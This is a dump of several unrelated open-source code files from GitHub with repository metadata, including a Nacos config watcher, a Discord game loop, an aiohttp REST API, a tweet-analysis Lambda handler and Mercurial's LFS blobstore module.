#!/usr/bin/env python3 # coding:utf-8 import os,hashlib import shutil import subprocess from datetime import datetime import nacos import yaml from apscheduler.schedulers.blocking import BlockingScheduler from dotenv import load_dotenv, find_dotenv # load .env file load_dotenv(find_dotenv(), override=True) SERVER_ADDRESSES = os.getenv("nacos_server") NAMESPACE = os.getenv("nacos_namespace_id") USERNAME = os.getenv("nacos_suth_user") PASSWORD = os.getenv("nacos_auth_passwd") # auth mode client = nacos.NacosClient(SERVER_ADDRESSES, namespace=NAMESPACE, username=USERNAME, password=PASSWORD) client.set_options(callback_thread_num=1) class Watcher(): def __init__(self): self.cf = cf def run(self): for p in self.cf['configs']: self.cf_path = p['path'] self.watch(id=p['id'], group=p['group']) def file_md5(self, file_path): with open(file_path, 'rb') as file: f = file.read() m = hashlib.md5() m.update(f) return m.hexdigest() def print_cm(self, status): snapshot_file = "{0}+{1}+{2}".format(status['data_id'], status['group'], NAMESPACE) for p in self.cf['configs']: if status['data_id'] == p['id'] and status['group'] == p['group']: if self.file_md5("nacos-data/snapshot/{}".format(snapshot_file)) != self.file_md5(p['path']): shutil.copyfileobj(open("nacos-data/snapshot/{}".format(snapshot_file), "rb"), open(p['path'], "wb")) s, r = subprocess.getstatusoutput(p['command']) if int(s) != 0: print("命令执行失败:{}".format(p['command'])) return True def watch(self, id, group): client.add_config_watcher(id, group, self.print_cm) if __name__ == '__main__': # 传入配置 with open('config.yaml', 'r+') as f: cf = yaml.load(f) # # 常驻调度任务 scheduler = BlockingScheduler() job = Watcher() # 每隔1分钟执行一次 job_func; scheduler.add_job(job.run, 'interval', minutes=1) try: print("{0} nacos watch the process start".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))) scheduler.start() except (KeyboardInterrupt, SystemExit): print("{0} nacos watch the process exit".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))) scheduler.shutdown()
GounGG/nacos-client-py
nacos-get-config.py
nacos-get-config.py
py
2,424
python
en
code
1
github-code
36
2708690996
from src.GameLogic.GenericGameLogic import GenericGameLogic class FightCycle(GenericGameLogic): def __init__(self, printMethod, data): super().__init__(printMethod,data) self.turn_order = None self.current_character = None self.index = 0 async def getMessage(self, message, actionPrompt): if not message.author.name == self.current_character.user: await self.printMethod(message.channel, "WAIT YOUR TURN") return await actionPrompt.do_action(message) await self.end_turn(message) async def end_turn(self, message): self.index = (self.index + 1) % (len(self.turn_order)) self.current_character = self.turn_order[self.index] await self.printMethod(message.channel, "It is now {}'s turn".format(self.current_character.name)) if self.current_character.is_npc(): await self.printMethod(message.channel, self.current_character.do_combat()) await self.end_turn(message) async def start_cycle(self, message): # Init the fight self.index = 0 self.turn_order = sorted(self.data.get_characters_from_current_room(), key=lambda c: c.speed, reverse=True) self.current_character = self.turn_order[self.index] await self.printMethod(message.channel, "The fight is on between {} and {}" .format(", ".join([c.name for c in self.data.get_player_characters_from_current_room()]) ,", ".join([c.name for c in self.data.get_npcs_from_current_room()]))) if self.current_character.is_npc(): await self.printMethod(message.channel, self.current_character.do_combat())
dndiscord/dndiscord
src/GameLogic/FightCycle.py
FightCycle.py
py
1,751
python
en
code
0
github-code
36
22359845771
def set_cover(universe, subsets): """Find a family of subsets that covers the universal set""" elements = set(e for s in subsets for e in s) # Check the subsets cover the universe if elements != universe: return None covered = set() cover = [] # Greedily add the subsets with the most uncovered points while covered != elements: subset = max(subsets, key=lambda s: len(s - covered)) cover.append(subset) covered |= subset return cover def main(): universe = set(range(1, 11)) subsets = [set([1, 2, 3, 8, 9, 10]), set([1, 2, 3, 4, 5]), set([4, 5, 7]), set([5, 6, 7]), set([6, 7, 8, 9, 10])] print("Universe is", universe) print("Subsets are") for i in subsets: print(i) print() cover = set_cover(universe, subsets) print("Set cover is", cover) if __name__ == '__main__': main()
LokeshNaidu8/MSc_Practicals
Practicals/Algorithm/setCover.py
setCover.py
py
941
python
en
code
1
github-code
36
38054510986
import accept import logging from aiohttp import web, web_exceptions from aiohttp_swagger import setup_swagger from model import ClientModel, ItemNotFoundException from protocol import * from prometheus_client import REGISTRY, exposition from urllib.parse import parse_qs from voluptuous import MultipleInvalid class Api: DEFAULT_CONTENT_TYPE = "application/json" logger = logging.getLogger(__name__) registry = REGISTRY __encoders = { "application/xml": XMLEncoder(), "application/json": JsonEncoder() } def __init__(self, host, port, transactor): self.__app = web.Application() self.__host = host self.__port = port self.__app.add_routes([ web.get('/', self.health), web.get('/metrics', self.metrics), web.get('/v1/cards', self.card_list), web.post('/v1/cards', self.add_card), web.get('/v1/clients', self.client_list), web.post('/v1/clients', self.add_client), web.get(r'/v1/clients/{id:\d+}/balance', self.client_balance), web.put(r'/v1/cards/{id:\d+}', self.change_card) ]) self.__client_model = ClientModel(transactor) def __paginate(self, request): qs = parse_qs(request.query_string) offsets = qs.get('offset', [0]) if len(offsets) > 1: raise web_exceptions.HTTPBadRequest(text='Invalid offset value') limits = qs.get('limit', [20]) if len(limits) > 1: raise web_exceptions.HTTPBadRequest(text='Invalid limit value') return int(offsets[0]), int(limits[0]) def __choose_encoder(self, request): for accept_header in accept.parse(request.headers.get('Accept')): if accept_header.media_type == '*/*': return self.__encoders.get(self.DEFAULT_CONTENT_TYPE) encoder = self.__encoders.get(accept_header.media_type) if encoder is not None: return encoder raise web_exceptions.HTTPNotAcceptable() async def __decode_post(self, request): if request.content_type == "application/json": return await request.json() if request.content_type == "application/xml": return {"data": "xml"} raise web_exceptions.HTTPBadRequest( text="Unknown Content-Type header. Only application/json, application/xml are allowed." ) async def start(self): setup_swagger(self.__app, swagger_url='/v1/docs') runner = web.AppRunner(self.__app) await runner.setup() service = web.TCPSite(runner, self.__host, self.__port) await service.start() self.logger.info('Service is started at %s:%s', self.__host, self.__port) async def health(self, _): """ --- description: Запрос для проверки успешного запуска сервиса. tags: - Health check produces: - text/plain responses: "200": description: успех. Возвращает информацию о сервисе """ return web.Response(text="Ok") async def metrics(self, request): """ --- description: Запрос для получения метрик сервиса tags: - Metrics produces: - text/plain responses: "200": description: успех. Возвращает метрики """ encoder, content_type = exposition.choose_encoder(request.headers.get('Accept')) scrape = encoder(self.registry) return web.Response(headers=dict([('Content-Type', content_type)]), body=scrape) async def card_list(self, request): """ --- description: Запрос для получения списка карт клиентов tags: - Cards produces: - application/json - application/xml parameters: - name: offset in: query description: Pagination offset required: false type: integer - name: limit in: query description: Pagination limit required: false type: integer responses: "200": description: успех. Возвращает список карт клиентов "406": description: ошибка клиента. Указан неверный Accept """ encoder = self.__choose_encoder(request) offset, limit = self.__paginate(request) cards, count = await self.__client_model.all_cards(offset, limit) return web.Response(content_type=encoder.content_type, body=encoder.encode(cards), headers={"X-Total": str(count)}) async def add_card(self, request): """ --- description: Запрос для добавления новой карты клиента tags: - Cards produces: - application/json - application/xml parameters: - name: card in: body description: данные новой карты required: true schema: type: object properties: owner_id: type: integer description: идентификатор владельца карты required: true payment_system: type: string description: платежная система required: true currency: type: string description: валюта карты required: true balance: type: numeric description: баланс карты required: true responses: "200": description: успех. Возвращает данные новой карты клиента "404": description: ошибка. Клиент не найден "406": description: ошибка клиента. Указан неверный Accept """ encoder = self.__choose_encoder(request) data = await self.__decode_post(request) try: card = await self.__client_model.add_card(data) return web.HTTPCreated(content_type=encoder.content_type, body=encoder.encode(card)) except MultipleInvalid as e: raise web_exceptions.HTTPBadRequest(text=str(e)) except ItemNotFoundException as e: raise web_exceptions.HTTPNotFound(text=str(e)) async def client_list(self, request): """ --- description: Запрос для получения списка клиентов tags: - Clients produces: - application/json - application/xml parameters: - name: offset in: query description: Pagination offset required: false type: integer - name: limit in: query description: Pagination limit required: false type: integer responses: "200": description: успех. Возвращает список клиентов "406": description: ошибка клиента. Указан неверный Accept """ encoder = self.__choose_encoder(request) offset, limit = self.__paginate(request) clients, count = await self.__client_model.all_clients(offset, limit) return web.Response(content_type=encoder.content_type, body=encoder.encode(clients), headers={"X-Total": str(count)}) async def add_client(self, request): """ --- description: Запрос для добавления нового клиента tags: - Clients produces: - application/json - application/xml parameters: - name: card in: body description: данные нового клиента required: true schema: type: object properties: name: type: string description: имя клиента responses: "200": description: успех. Возвращает данные нового клиента "406": description: ошибка клиента. Указан неверный Accept """ encoder = self.__choose_encoder(request) data = await self.__decode_post(request) try: client = await self.__client_model.add_client(data) return web.HTTPCreated(content_type=encoder.content_type, body=encoder.encode(client)) except MultipleInvalid as e: raise web_exceptions.HTTPBadRequest(text=str(e)) async def client_balance(self, request): """ --- description: Запрос для получения баланса клиента tags: - Clients produces: - application/json - application/xml parameters: - name: id in: path description: идентификатор клиента required: false type: integer responses: "200": description: успех. Возвращает данные нового клиента "404": description: ошибка. Клиент не найден "406": description: ошибка клиента. Указан неверный Accept """ client_id = int(request.match_info.get('id')) encoder = self.__choose_encoder(request) client = await self.__client_model.client_balance(client_id) return web.Response(content_type=encoder.content_type, body=encoder.encode(client)) async def change_card(self, request): """ --- description: Запрос для изменение данных по карте tags: - Cards produces: - application/json - application/xml parameters: - name: id in: path description: идентификатор карты required: true type: integer - name: card in: body description: данные карты required: true schema: type: object properties: owner_id: type: integer description: идентификатор владельца карты payment_system: type: string description: платежная система currency: type: string description: валюта карты balance: type: float description: баланс карты responses: "200": description: успех. Возвращает измененные данные карты "400": description: ошибка клиента. Указаны неверные данные карты "404": description: ошибка. Карта не найдена "406": description: ошибка клиента. Указан неверный Accept """ card_id = int(request.match_info.get('id')) encoder = self.__choose_encoder(request) data = await self.__decode_post(request) try: card = await self.__client_model.change_card(card_id, data) return web.Response(content_type=encoder.content_type, body=encoder.encode(card)) except MultipleInvalid as e: raise web_exceptions.HTTPBadRequest(text=str(e))
weierstrass54/sb_rest
api.py
api.py
py
12,166
python
en
code
0
github-code
36
72447544744
#!/usr/bin/python -tt # -*- coding: utf-8 -*- # Examen LAGRS, diciembre 2018 # NOMBRE: Jorge Luzon Lopez # LOGIN: jluzon import telepot import telepot.namedtuple import time import subprocess,sys import os from telepot.loop import MessageLoop from optparse import OptionParser PUERTOS_TCP = [6666 , 443 , 7899] def readkey(): try: file = open("token.txt","r") key = file.readline() file.close() return key except IOError: sys.stderr.write("Could not read key\n") raise SystemExit def iduser(): try: file = open("id_usuario.txt","r") key = file.readline() file.close() return key except IOError: sys.stderr.write("Could not read key\n") raise SystemExit TOKEN = readkey() ID_USUARIO = iduser() bot = telepot.Bot(TOKEN) def checkpuerto(port): for p in PUERTOS_TCP: if int(p) == int(port): return True def checkline(lines): r="" for l in lines: fields=l.split() if checkpuerto(fields[3].split(":")[-1]): r+=fields[3].split(":")[-1] + " " + fields[5] + "\n" return r def donetstat(): cmd = "netstat -tupan" try: out=subprocess.check_output(cmd.split()) out=out.split("\n") out.pop(0) out.pop(0) out.pop() r=checkline(out) return r except: sys.stderr.write("CMD failed\n") raise SystemExit def handle(): respuesta = donetstat() if len(respuesta) > 0: respuesta += "Ports USED\n" bot.sendMessage(ID_USUARIO,respuesta) return def main(): handle() if __name__ == '__main__': main()
jluzonlopez/Largs
extralagrs/vigila_puertos.py
vigila_puertos.py
py
1,538
python
en
code
0
github-code
36
31608746342
import torch from torch import nn from torch.autograd import Variable class topk_crossEntrophy(nn.Module): def __init__(self, top_k=0.7): super(topk_crossEntrophy, self).__init__() self.loss = nn.NLLLoss() self.top_k = top_k self.softmax = nn.LogSoftmax() return def forward(self, input, target): softmax_result = self.softmax(input) loss = Variable(torch.Tensor(1).zero_()).cuda() for idx, row in enumerate(softmax_result): gt = target[idx] pred = torch.unsqueeze(row, 0) gt = torch.unsqueeze(gt, 0) cost = self.loss(pred, gt) loss = torch.cat((loss, cost.unsqueeze(0)), 0) loss = loss[1:] if self.top_k == 1: valid_loss = loss index = torch.topk(loss, int(self.top_k * loss.size()[0])) valid_loss = loss[index[1]] return torch.mean(valid_loss)
Forrest0503/VAT-ABAW
ohem_loss.py
ohem_loss.py
py
987
python
en
code
0
github-code
36
5106024377
import re import json import base64 import pandas as pd import networkx as nx from textblob import TextBlob from collections import defaultdict from arabic_reshaper import reshape from bidi.algorithm import get_display from requests_toolbelt.multipart import decoder def generate_hashtag_data(file_path): # Read the excel file df = pd.read_excel(file_path) # Define function to extract hashtags from each tweet def extract_hashtags(text): hashtags = re.findall(r'\#\w+', text) return hashtags # Create a list of all hashtags in the dataframe all_hashtags = [] for tweet in df['Tweet']: hashtags = extract_hashtags(tweet) all_hashtags.extend(hashtags) # Create a dictionary to store the frequency of each hashtag frequency = {} for hashtag in all_hashtags: if hashtag in frequency: frequency[hashtag] += 1 else: frequency[hashtag] = 1 # Reshape and reorder the text reshaped_text = {} for k, v in frequency.items(): reshaped_k = reshape(k) bidi_k = get_display(reshaped_k) reshaped_text[bidi_k] = v # Return the data return { "hashtag_frequency": frequency, "reshaped_text": reshaped_text } def generate_sentiment_data(file_path): # Load the data from Excel file df = pd.read_excel(file_path) # Define function to calculate sentiment polarity def get_sentiment(text): blob = TextBlob(text) return blob.sentiment.polarity # Create a dictionary to store sentiment values for each user sentiments = defaultdict(list) # Iterate over each row in the DataFrame for index, row in df.iterrows(): # Get the user and tweet user = row['User'] tweet = row['Tweet'] # Calculate sentiment polarity of the tweet sentiment = get_sentiment(tweet) # Append sentiment to the list of sentiments for the user sentiments[user].append(sentiment) # Create a list of sentiment data for each user sentiment_data = [] for user in df['User'].unique(): user_sentiments = sentiments[user] indices = list(range(1, len(user_sentiments) + 1)) sentiment_data.append( {"user": user, "indices": indices, "sentiments": user_sentiments}) return sentiment_data def generate_user_tweet_counts(file_path): # Read the Excel file into a Pandas DataFrame df = pd.read_excel(file_path) # Group the data by user and count the number of tweets for each user user_counts = df.groupby('User').size().reset_index(name='count') # Convert the user_counts DataFrame into a list of dictionaries user_tweet_counts = user_counts.to_dict('records') return user_tweet_counts def generate_user_mentions_graph_data(file_path): # Load the Excel file into a Pandas DataFrame df = pd.read_excel(file_path) # Extract the usernames from the tweet column using regular expressions df['username'] = df['Tweet'].str.extract(r'@(\w+)') # Create a list of unique usernames users = list(df['username'].dropna().unique()) # Create an empty directed graph using NetworkX G = nx.DiGraph() # Add nodes to the graph for each user for user in users: G.add_node(user) # Add edges to the graph for each mention for tweet in df['Tweet']: # Find all mentions in the tweet using regular expressions mentions = re.findall(r'@(\w+)', tweet) # Create edges between the mentioned users for i in range(len(mentions)): for j in range(i+1, len(mentions)): G.add_edge(mentions[i], mentions[j]) # Calculate the degree centrality of each node (user) centrality = nx.degree_centrality(G) # Sort the centrality dictionary by value in descending order sorted_centrality = sorted( centrality.items(), key=lambda x: x[1], reverse=True) # Get the top 10 most influential users top_users = [user[0] for user in sorted_centrality[:10]] # Create a subgraph of the top users H = G.subgraph(top_users) # Create a dictionary containing the necessary data for the frontend graph_data = { 'nodes': [node for node in H.nodes()], 'edges': [{'source': edge[0], 'target': edge[1]} for edge in H.edges()], } return graph_data def generate_map_data(file_path): # Load the data from the Excel file data = pd.read_excel(file_path) # Filter out rows without coordinates data = data[data['coordinates'].notna()] # Extract coordinates and create a list of dictionaries with lat and lon coords_list = [] for i, row in data.iterrows(): coords_str = row['coordinates'] lon = float(coords_str.split(',')[0].split('=')[1]) lat = float(coords_str.split(',')[1].split('=')[1][:-1]) coords_list.append({'lat': lat, 'lon': lon}) # Return the coordinates data return coords_list headers = { "Access-Control-Allow-Origin": "*", # Adjust the value according to your needs "Access-Control-Allow-Headers": "Content-Type,X-Amz-Date,Authorization,X-Api-Key", "Access-Control-Allow-Methods": "OPTIONS,GET,POST,PUT,PATCH,DELETE", "Access-Control-Allow-Credentials": "true", } def handler(event, context): # decode the multipart form data decoded_str = base64.b64decode(event["body"]) content_type_header = event["headers"]["content-type"] multipart_data = decoder.MultipartDecoder( decoded_str, content_type_header) # get the file data from the multipart data file = multipart_data.parts[0] # print the file name print(file.headers[b'Content-Disposition'].decode().split(';')[1]) # generate hashtag data hashtag_data = generate_hashtag_data(file.content) # generate sentiment data sentiment_data = generate_sentiment_data(file.content) # generate user tweet counts user_tweet_counts = generate_user_tweet_counts(file.content) # generate user mentions graph data user_mentions_graph_data = generate_user_mentions_graph_data(file.content) # generate map data map_data = generate_map_data(file.content) # return the response return { "statusCode": 200, "headers": headers, "body": json.dumps({ "hashtag_data": hashtag_data, "sentiment_data": sentiment_data, "user_tweet_counts": user_tweet_counts, "user_mentions_graph_data": user_mentions_graph_data, "map_data": map_data }) }
kashif-ghafoor/twitter-scrap-infa
src/hashtagAnalysis/index.py
index.py
py
6,609
python
en
code
0
github-code
36
13070129833
import math def roundPrice(A): # attention: in python3, round(1.5) = 1 !!! def round(x): fac = x - math.floor(x) return math.ceil(x) if fac >= 0.5 else math.floor(x) if not A: return A roundSum = sum(map(round, A)) sumRound = round(sum(A)) print(roundSum) print(sumRound) res = [round(a) for a in A] if roundSum == sumRound: return res elif roundSum > sumRound: cnt = roundSum - sumRound # need to make cnt number to round(number) - 1 nums = sorted([(a - math.floor(a), a, i) for i, a in enumerate(A)]) for fac, a, i in nums: if fac >= 0.5 and cnt > 0: res[i] = math.floor(a) cnt -= 1 else: res[i] = round(a) return res else: cnt = sumRound - roundSum # need to make cnt number to round(number) + 1 nums = sorted([(a - math.floor(a), a, i) for i, a in enumerate(A)])[::-1] for fac, a, i in nums: if fac < 0.5 and cnt > 0: res[i] = math.ceil(a) cnt -= 1 else: res[i] = round(a) return res print(roundPrice([1,2,3,4]))
Jason003/Interview_Code_Python
Airbnb/roundPrice.py
roundPrice.py
py
1,203
python
en
code
3
github-code
36
22577716879
''' Created on May 29, 2017 @author: hfrieden Export ASC DEM files ''' import struct import bpy import bmesh import os.path as path import ArmaToolbox from math import sqrt def vertIdx(x,y,ncols, nrows): return y*ncols + x def exportASC(context, fileName): filePtr = open(fileName, "wt") obj = context.object props = obj.armaHFProps # dump Header verts = len(obj.data.vertices) rowcols = sqrt(verts) filePtr.write("ncols " + str(rowcols) + "\n") filePtr.write("nrows " + str(rowcols) + "\n") filePtr.write("xllcorner " + str(props.northing) + "\n") filePtr.write("yllcorner " + str(props.easting) + "\n") filePtr.write("cellsize " + str(props.cellSize) + "\n") filePtr.write("NODATA_value " + str(props.undefVal) + "\n") # dump the heightfield. One line contains one row of vertices row = rowcols for v in obj.data.vertices: filePtr.write("{:.4f}".format(v.co[2])) row -= 1 if row == 0: filePtr.write("\n") row = rowcols else: filePtr.write(" ") filePtr.close()
AlwarrenSidh/ArmAToolbox
ArmaToolbox/ASCExporter.py
ASCExporter.py
py
1,167
python
en
code
70
github-code
36
29757178996
# Definition for a binary tree node. # class TreeNode(object): # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution(object): def isUnivalTree(self, root): """ :type root: TreeNode :rtype: bool """ unival = root.val stack = [root] while len(stack) > 0: cur = stack.pop() if cur != None: if cur.val != unival: return False stack.append(cur.left) stack.append(cur.right) return True
hrithikguy/leetcode
965_univalued_binary_tree.py
965_univalued_binary_tree.py
py
632
python
en
code
0
github-code
36
34530261292
from __future__ import absolute_import import hashlib import json import os import re import socket from mercurial.i18n import _ from mercurial import ( error, pathutil, url as urlmod, util, vfs as vfsmod, worker, ) from ..largefiles import lfutil # 64 bytes for SHA256 _lfsre = re.compile(r'\A[a-f0-9]{64}\Z') class lfsvfs(vfsmod.vfs): def join(self, path): """split the path at first two characters, like: XX/XXXXX...""" if not _lfsre.match(path): raise error.ProgrammingError('unexpected lfs path: %s' % path) return super(lfsvfs, self).join(path[0:2], path[2:]) def walk(self, path=None, onerror=None): """Yield (dirpath, [], oids) tuple for blobs under path Oids only exist in the root of this vfs, so dirpath is always ''. """ root = os.path.normpath(self.base) # when dirpath == root, dirpath[prefixlen:] becomes empty # because len(dirpath) < prefixlen. prefixlen = len(pathutil.normasprefix(root)) oids = [] for dirpath, dirs, files in os.walk(self.reljoin(self.base, path or ''), onerror=onerror): dirpath = dirpath[prefixlen:] # Silently skip unexpected files and directories if len(dirpath) == 2: oids.extend([dirpath + f for f in files if _lfsre.match(dirpath + f)]) yield ('', [], oids) class filewithprogress(object): """a file-like object that supports __len__ and read. Useful to provide progress information for how many bytes are read. """ def __init__(self, fp, callback): self._fp = fp self._callback = callback # func(readsize) fp.seek(0, os.SEEK_END) self._len = fp.tell() fp.seek(0) def __len__(self): return self._len def read(self, size): if self._fp is None: return b'' data = self._fp.read(size) if data: if self._callback: self._callback(len(data)) else: self._fp.close() self._fp = None return data class local(object): """Local blobstore for large file contents. This blobstore is used both as a cache and as a staging area for large blobs to be uploaded to the remote blobstore. """ def __init__(self, repo): fullpath = repo.svfs.join('lfs/objects') self.vfs = lfsvfs(fullpath) usercache = lfutil._usercachedir(repo.ui, 'lfs') self.cachevfs = lfsvfs(usercache) self.ui = repo.ui def open(self, oid): """Open a read-only file descriptor to the named blob, in either the usercache or the local store.""" # The usercache is the most likely place to hold the file. Commit will # write to both it and the local store, as will anything that downloads # the blobs. However, things like clone without an update won't # populate the local store. For an init + push of a local clone, # the usercache is the only place it _could_ be. If not present, the # missing file msg here will indicate the local repo, not the usercache. if self.cachevfs.exists(oid): return self.cachevfs(oid, 'rb') return self.vfs(oid, 'rb') def download(self, oid, src): """Read the blob from the remote source in chunks, verify the content, and write to this local blobstore.""" sha256 = hashlib.sha256() with self.vfs(oid, 'wb', atomictemp=True) as fp: for chunk in util.filechunkiter(src, size=1048576): fp.write(chunk) sha256.update(chunk) realoid = sha256.hexdigest() if realoid != oid: raise error.Abort(_('corrupt remote lfs object: %s') % oid) # XXX: should we verify the content of the cache, and hardlink back to # the local store on success, but truncate, write and link on failure? if not self.cachevfs.exists(oid): self.ui.note(_('lfs: adding %s to the usercache\n') % oid) lfutil.link(self.vfs.join(oid), self.cachevfs.join(oid)) def write(self, oid, data): """Write blob to local blobstore. This should only be called from the filelog during a commit or similar. As such, there is no need to verify the data. Imports from a remote store must use ``download()`` instead.""" with self.vfs(oid, 'wb', atomictemp=True) as fp: fp.write(data) # XXX: should we verify the content of the cache, and hardlink back to # the local store on success, but truncate, write and link on failure? if not self.cachevfs.exists(oid): self.ui.note(_('lfs: adding %s to the usercache\n') % oid) lfutil.link(self.vfs.join(oid), self.cachevfs.join(oid)) def read(self, oid, verify=True): """Read blob from local blobstore.""" if not self.vfs.exists(oid): blob = self._read(self.cachevfs, oid, verify) # Even if revlog will verify the content, it needs to be verified # now before making the hardlink to avoid propagating corrupt blobs. # Don't abort if corruption is detected, because `hg verify` will # give more useful info about the corruption- simply don't add the # hardlink. if verify or hashlib.sha256(blob).hexdigest() == oid: self.ui.note(_('lfs: found %s in the usercache\n') % oid) lfutil.link(self.cachevfs.join(oid), self.vfs.join(oid)) else: self.ui.note(_('lfs: found %s in the local lfs store\n') % oid) blob = self._read(self.vfs, oid, verify) return blob def _read(self, vfs, oid, verify): """Read blob (after verifying) from the given store""" blob = vfs.read(oid) if verify: _verify(oid, blob) return blob def has(self, oid): """Returns True if the local blobstore contains the requested blob, False otherwise.""" return self.cachevfs.exists(oid) or self.vfs.exists(oid) class _gitlfsremote(object): def __init__(self, repo, url): ui = repo.ui self.ui = ui baseurl, authinfo = url.authinfo() self.baseurl = baseurl.rstrip('/') useragent = repo.ui.config('experimental', 'lfs.user-agent') if not useragent: useragent = 'git-lfs/2.3.4 (Mercurial %s)' % util.version() self.urlopener = urlmod.opener(ui, authinfo, useragent) self.retry = ui.configint('lfs', 'retry') def writebatch(self, pointers, fromstore): """Batch upload from local to remote blobstore.""" self._batch(pointers, fromstore, 'upload') def readbatch(self, pointers, tostore): """Batch download from remote to local blostore.""" self._batch(pointers, tostore, 'download') def _batchrequest(self, pointers, action): """Get metadata about objects pointed by pointers for given action Return decoded JSON object like {'objects': [{'oid': '', 'size': 1}]} See https://github.com/git-lfs/git-lfs/blob/master/docs/api/batch.md """ objects = [{'oid': p.oid(), 'size': p.size()} for p in pointers] requestdata = json.dumps({ 'objects': objects, 'operation': action, }) batchreq = util.urlreq.request('%s/objects/batch' % self.baseurl, data=requestdata) batchreq.add_header('Accept', 'application/vnd.git-lfs+json') batchreq.add_header('Content-Type', 'application/vnd.git-lfs+json') try: rawjson = self.urlopener.open(batchreq).read() except util.urlerr.httperror as ex: raise LfsRemoteError(_('LFS HTTP error: %s (action=%s)') % (ex, action)) try: response = json.loads(rawjson) except ValueError: raise LfsRemoteError(_('LFS server returns invalid JSON: %s') % rawjson) return response def _checkforservererror(self, pointers, responses, action): """Scans errors from objects Raises LfsRemoteError if any objects have an error""" for response in responses: # The server should return 404 when objects cannot be found. Some # server implementation (ex. lfs-test-server) does not set "error" # but just removes "download" from "actions". Treat that case # as the same as 404 error. notfound = (response.get('error', {}).get('code') == 404 or (action == 'download' and action not in response.get('actions', []))) if notfound: ptrmap = {p.oid(): p for p in pointers} p = ptrmap.get(response['oid'], None) if p: filename = getattr(p, 'filename', 'unknown') raise LfsRemoteError( _(('LFS server error. Remote object ' 'for "%s" not found: %r')) % (filename, response)) else: raise LfsRemoteError( _('LFS server error. Unsolicited response for oid %s') % response['oid']) if 'error' in response: raise LfsRemoteError(_('LFS server error: %r') % response) def _extractobjects(self, response, pointers, action): """extract objects from response of the batch API response: parsed JSON object returned by batch API return response['objects'] filtered by action raise if any object has an error """ # Scan errors from objects - fail early objects = response.get('objects', []) self._checkforservererror(pointers, objects, action) # Filter objects with given action. Practically, this skips uploading # objects which exist in the server. filteredobjects = [o for o in objects if action in o.get('actions', [])] return filteredobjects def _basictransfer(self, obj, action, localstore): """Download or upload a single object using basic transfer protocol obj: dict, an object description returned by batch API action: string, one of ['upload', 'download'] localstore: blobstore.local See https://github.com/git-lfs/git-lfs/blob/master/docs/api/\ basic-transfers.md """ oid = str(obj['oid']) href = str(obj['actions'][action].get('href')) headers = obj['actions'][action].get('header', {}).items() request = util.urlreq.request(href) if action == 'upload': # If uploading blobs, read data from local blobstore. with localstore.open(oid) as fp: _verifyfile(oid, fp) request.data = filewithprogress(localstore.open(oid), None) request.get_method = lambda: 'PUT' for k, v in headers: request.add_header(k, v) response = b'' try: req = self.urlopener.open(request) if action == 'download': # If downloading blobs, store downloaded data to local blobstore localstore.download(oid, req) else: while True: data = req.read(1048576) if not data: break response += data if response: self.ui.debug('lfs %s response: %s' % (action, response)) except util.urlerr.httperror as ex: if self.ui.debugflag: self.ui.debug('%s: %s\n' % (oid, ex.read())) raise LfsRemoteError(_('HTTP error: %s (oid=%s, action=%s)') % (ex, oid, action)) def _batch(self, pointers, localstore, action): if action not in ['upload', 'download']: raise error.ProgrammingError('invalid Git-LFS action: %s' % action) response = self._batchrequest(pointers, action) objects = self._extractobjects(response, pointers, action) total = sum(x.get('size', 0) for x in objects) sizes = {} for obj in objects: sizes[obj.get('oid')] = obj.get('size', 0) topic = {'upload': _('lfs uploading'), 'download': _('lfs downloading')}[action] if len(objects) > 1: self.ui.note(_('lfs: need to transfer %d objects (%s)\n') % (len(objects), util.bytecount(total))) self.ui.progress(topic, 0, total=total) def transfer(chunk): for obj in chunk: objsize = obj.get('size', 0) if self.ui.verbose: if action == 'download': msg = _('lfs: downloading %s (%s)\n') elif action == 'upload': msg = _('lfs: uploading %s (%s)\n') self.ui.note(msg % (obj.get('oid'), util.bytecount(objsize))) retry = self.retry while True: try: self._basictransfer(obj, action, localstore) yield 1, obj.get('oid') break except socket.error as ex: if retry > 0: self.ui.note( _('lfs: failed: %r (remaining retry %d)\n') % (ex, retry)) retry -= 1 continue raise # Until https multiplexing gets sorted out if self.ui.configbool('experimental', 'lfs.worker-enable'): oids = worker.worker(self.ui, 0.1, transfer, (), sorted(objects, key=lambda o: o.get('oid'))) else: oids = transfer(sorted(objects, key=lambda o: o.get('oid'))) processed = 0 for _one, oid in oids: processed += sizes[oid] self.ui.progress(topic, processed, total=total) self.ui.note(_('lfs: processed: %s\n') % oid) self.ui.progress(topic, pos=None, total=total) def __del__(self): # copied from mercurial/httppeer.py urlopener = getattr(self, 'urlopener', None) if urlopener: for h in urlopener.handlers: h.close() getattr(h, "close_all", lambda : None)() class _dummyremote(object): """Dummy store storing blobs to temp directory.""" def __init__(self, repo, url): fullpath = repo.vfs.join('lfs', url.path) self.vfs = lfsvfs(fullpath) def writebatch(self, pointers, fromstore): for p in pointers: content = fromstore.read(p.oid(), verify=True) with self.vfs(p.oid(), 'wb', atomictemp=True) as fp: fp.write(content) def readbatch(self, pointers, tostore): for p in pointers: with self.vfs(p.oid(), 'rb') as fp: tostore.download(p.oid(), fp) class _nullremote(object): """Null store storing blobs to /dev/null.""" def __init__(self, repo, url): pass def writebatch(self, pointers, fromstore): pass def readbatch(self, pointers, tostore): pass class _promptremote(object): """Prompt user to set lfs.url when accessed.""" def __init__(self, repo, url): pass def writebatch(self, pointers, fromstore, ui=None): self._prompt() def readbatch(self, pointers, tostore, ui=None): self._prompt() def _prompt(self): raise error.Abort(_('lfs.url needs to be configured')) _storemap = { 'https': _gitlfsremote, 'http': _gitlfsremote, 'file': _dummyremote, 'null': _nullremote, None: _promptremote, } def _verify(oid, content): realoid = hashlib.sha256(content).hexdigest() if realoid != oid: raise error.Abort(_('detected corrupt lfs object: %s') % oid, hint=_('run hg verify')) def _verifyfile(oid, fp): sha256 = hashlib.sha256() while True: data = fp.read(1024 * 1024) if not data: break sha256.update(data) realoid = sha256.hexdigest() if realoid != oid: raise error.Abort(_('detected corrupt lfs object: %s') % oid, hint=_('run hg verify')) def remote(repo): """remotestore factory. return a store in _storemap depending on config""" url = util.url(repo.ui.config('lfs', 'url') or '') scheme = url.scheme if scheme not in _storemap: raise error.Abort(_('lfs: unknown url scheme: %s') % scheme) return _storemap[scheme](repo, url) class LfsRemoteError(error.RevlogError): pass
bruno-oliveira/twilioHackathon-whats-around-me
env/lib/python2.7/site-packages/hgext/lfs/blobstore.py
blobstore.py
py
17,091
python
en
code
0
github-code
36
12080392849
